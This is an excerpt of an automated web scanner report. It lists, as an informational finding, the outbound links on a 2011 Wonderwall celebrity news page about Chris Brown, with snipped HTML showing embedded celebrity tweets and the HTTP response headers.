<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.363. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/music/chris-brown-completes-domestic-violence-program-1594072.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story?GT1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://del.icio.us/post?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://digg.com/submit?phase=2title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://sch.mp/0jHde
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg
http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Original/41220_Original.jpg
http://tl.gd/8g30qb
http://twitpic.com/3uqhh4
http://twitter.com/Akeel93
http://twitter.com/AshNHartz
http://twitter.com/AtlantaPlaces
http://twitter.com/Banshee_Song
http://twitter.com/Bethenny
http://twitter.com/Bethenny/statuses/31719343947522049
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31716032452231168
http://twitter.com/BrandonnStRegis
http://twitter.com/BravoAndy
http://twitter.com/BrielleZolciak
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31727445837090816
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/31705092302315520
http://twitter.com/Jillzarin/statuses/31705598416392194
http://twitter.com/JoshGottlieb
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/31711564050472961
http://twitter.com/Kimzolciak/statuses/31712300427644928
http://twitter.com/Kimzolciak/statuses/31712647732797440
http://twitter.com/Kimzolciak/statuses/31712954776821760
http://twitter.com/Kimzolciak/statuses/31716118221561856
http://twitter.com/Kimzolciak/statuses/31716672863731714
http://twitter.com/Kimzolciak/statuses/31726145497989121
http://twitter.com/Kimzolciak/statuses/31729214356979713
http://twitter.com/Kimzolciak/statuses/31729553827172352
http://twitter.com/Kimzolciak/statuses/31734736913170432
http://twitter.com/KingLj11
http://twitter.com/MsBrandi17
http://twitter.com/NickCannon
http://twitter.com/NickCannon/statuses/31746607615574016
http://twitter.com/OMGitsjessielee
http://twitter.com/Please_Stand_By
http://twitter.com/Sn00ki
http://twitter.com/Sn00ki/statuses/31737381589614592
http://twitter.com/TheBatkave
http://twitter.com/alydenisof
http://twitter.com/alydenisof/statuses/31744920150614016
http://twitter.com/arianazolciak
http://twitter.com/biermann71
http://twitter.com/buddyhead
http://twitter.com/continental
http://twitter.com/davenavarro6767
http://twitter.com/davenavarro6767/statuses/31674584327528449
http://twitter.com/davenavarro6767/statuses/31688081048342528
http://twitter.com/davenavarro6767/statuses/31690324585742336
http://twitter.com/ipierce89
http://twitter.com/iutrav
http://twitter.com/joshgroban
http://twitter.com/joshgroban/statuses/31671556916645888
http://twitter.com/joshgroban/statuses/31672009905672192
http://twitter.com/kimzolciak
http://twitter.com/lxnewyork
http://twitter.com/lxtvopenho
http://twitter.com/mikelizonn
http://twitter.com/prabalgurung
http://twitter.com/rzrachelzoe
http://twitter.com/rzrachelzoe/statuses/31667825831579649
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story%3Focid%3Dtwtr-utweet
http://twitter.com/wendyhagen
http://twitter.com/yokoono
http://twitter.com/yokoono/statuses/31743517785071616
http://www.associatedpress.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Chris+Brown+completes+domestic+violence+program&u=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://youtu.be/fX_120DMFDQ
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:56:54 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 145
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/41220_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/41220_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/38333_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/40989_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/28533_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/23689_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43555_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Chris+Brown+completes+domestic+violence+program&u=http%3A%2F%2Fwonderwall.msn.com%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Reddit</a>
...[SNIP]...
<cite><a href="http://www.associatedpress.com/">The Associated Press</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a> EVERY1 tune in2 the 90 minute long SEASON FINALE of RHOA 10pm on Bravo & <a href="http://twitter.com/kimzolciak">@kimzolciak</a> & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31726145497989121">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
